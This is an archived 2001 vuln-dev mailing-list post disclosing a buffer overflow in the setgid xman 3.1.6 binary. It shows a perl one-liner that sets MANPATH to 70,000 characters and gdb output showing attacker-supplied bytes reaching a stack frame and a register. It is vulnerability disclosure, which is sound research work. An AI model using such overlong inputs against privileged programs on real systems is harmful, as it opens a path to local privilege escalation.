I tried to send this to Bugtraq right about the same time I had connection issues... not sure if it was denied so I figured I would try to send it to vuln-dev just incase. -KF -------- Original Message -------- Subject: suid xman 3.1.6 overflows Date: Wed, 11 Jul 2001 23:32:49 -0400 From: KF <dotslashat_private> To: bugtraqat_private, srtxgat_private xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow srtxgat_private is noted as the packager of this RPM. I do not know the author. [root@linux lib]# ls -al `which xman` -rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman* [root@linux lib]# xman [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'` [root@linux lib]# xman Xman Error: Could not allocate memory for manual sections. [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'` [root@linux lib]# xman Segmentation fault [root@linux lib]# gdb xman GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 (gdb) run Starting program: /usr/X11R6/bin/xman 0x4022fb66 in getenv () from /lib/libc.so.6 (gdb) bt #0 0x4022fb66 in getenv () from /lib/libc.so.6 #1 0x0804bc47 in _start () #2 0x41414141 in ?? () Cannot access memory at address 0x41414141 (gdb) info registers eax 0xbffee784 -1073813628 ecx 0x804fb29 134544169 edx 0x805414c 134562124 ebx 0x40328f2c 1077055276 esp 0xbffec6fc 0xbffec6fc ebp 0xbffec714 0xbffec714 esi 0x6 6 edi 0x41414141 1094795585 eip 0x4022fb66 0x4022fb66 -KF
This archive was generated by hypermail 2b30 : Fri Jul 13 2001 - 18:47:50 PDT